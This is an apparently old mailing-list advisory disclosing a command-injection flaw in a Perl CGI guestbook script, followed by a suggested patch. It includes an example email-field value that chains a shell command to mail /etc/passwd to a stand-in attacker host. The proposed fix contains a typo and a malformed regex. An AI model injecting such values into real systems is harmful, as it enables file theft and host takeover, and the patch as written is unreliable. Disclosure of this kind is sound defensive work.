cgi vulnerability

["supdavid" <supdavid () bluewin ch>]

hi all
I found a security hole in Book of guests and Post it! written by Seth
Leonard. It is available at http://www.dreamcachersweb.com
The problem is that this script doesn't filter out ANY metacharacters from
the input and pass it to the shell.
Therefore by writing something like email () mail com;cat /etc/passwd|mail
evil () evilhost com into the email field,  the attacker could take control
over the host.

patch:
first of all it isn't a bad idea to set the permissions of the script
corectly. Furthermore the line
if ($INPUT{'email'} =~ /(.*)@(.*)/) { ... } should be replaced by something
like
if ($INPUT{'emai'} =~ /^[\w-.]+\@[\w-.]) { ... }

David Kumme, 16